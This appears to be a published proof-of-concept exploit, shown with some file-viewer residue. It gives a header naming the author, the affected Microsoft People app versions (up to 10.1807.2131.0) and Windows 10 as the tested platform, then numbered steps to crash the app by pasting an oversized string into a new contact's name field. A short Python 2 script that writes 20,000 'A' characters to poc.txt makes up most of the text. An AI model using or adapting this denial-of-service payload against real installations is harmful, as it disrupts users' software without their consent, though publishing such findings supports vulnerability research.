36 lines
No EOL
1.2 KiB
Text
36 lines
No EOL
1.2 KiB
Text
# Exploit Title: Microsoft people 10.1807.2131.0 - Denial of service (PoC)
|
|
# Exploit Author : L0RD
|
|
# Contact: borna.nematzadeh123@gmail.com
|
|
# Date: 2018-09-04
|
|
# Vendor Homepage : https://www.microsoft.com
|
|
# Software link: https://www.microsoft.com/en-us/p/microsoft-people/9nblggh10pg8?activetab=pivot:overviewtab
|
|
# Version: <= 10.1807.2131.0
|
|
# Tested on: Windows 10
|
|
# CVE: N/A
|
|
|
|
# Description:
|
|
# Microsoft people desktop application is a contact management app and
|
|
# address book included in Microsoft's Windows 8 and 10.
|
|
# It allows a user to organize and link contacts from different email
|
|
# accounts with a unique graphical interface
|
|
# More information :
|
|
# https://support.microsoft.com/en-us/help/14103/windows-people-app-help
|
|
|
|
# Steps to reproduce:
|
|
# 1) Run the python exploit code and copy content of file.
|
|
# 2) Open people application
|
|
# 3) Click on "new contact (+)" and paste content of "poc.txt" into name filed and save contact
|
|
# 4) Crash!
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "\x41" * 20000
|
|
payload = buffer
|
|
try:
|
|
f=open("poc.txt","w")
|
|
print "[+] Creating %s bytes payload..." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |